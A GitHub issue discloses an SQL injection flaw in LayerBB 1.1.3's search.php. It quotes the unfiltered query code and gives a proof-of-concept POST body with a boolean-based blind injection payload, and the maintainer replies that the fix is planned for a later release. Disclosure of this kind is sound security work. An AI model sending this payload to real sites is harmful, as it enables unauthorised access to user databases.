Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SQL injection vulnerability #51

Open
yaoyao6688 opened this issue Oct 10, 2019 · 1 comment
Open

SQL injection vulnerability #51

yaoyao6688 opened this issue Oct 10, 2019 · 1 comment
Assignees
@AndyRixon
Labels
bug
Milestone
1.1.4

Comments

@yaoyao6688
Copy link

LayerBB 1.1.3 has SQL Injection via the search.php search_query parameter.

Steps to Reproduce Issue

in search.php 86-91
if ((isset($_POST['user_search']) && isset($_POST['search_type'])) || !isset($_POST['search_type'])) { $MYSQL->bind('search_query', $search_query); $query = $MYSQL->query("SELECT * FROM {prefix}users WHERE username LIKE CONCAT('%',:search_query,'%');");
Unfiltered search_query results in SQL injection
POC
Packet parameters
search_query=admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB&time_from=1996&time_to=2019&user_search=on&search_type=advanced&search_submit=Search

Server Environment (PHP, MySQL, Apache Version and Operating System):
version 1.1.3
@AndyRixon AndyRixon self-assigned this Nov 7, 2019
@AndyRixon AndyRixon added the bug label Nov 7, 2019
@AndyRixon AndyRixon added this to the 1.1.4 milestone Nov 7, 2019
@AndyRixon
Copy link
Owner

I've had some major issues with the entire search system, I will take a look into this one further.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@AndyRixon AndyRixon

Labels
bug
Projects
None yet
Milestone
1.1.4
Development

No branches or pull requests
2 participants
@AndyRixon @yaoyao6688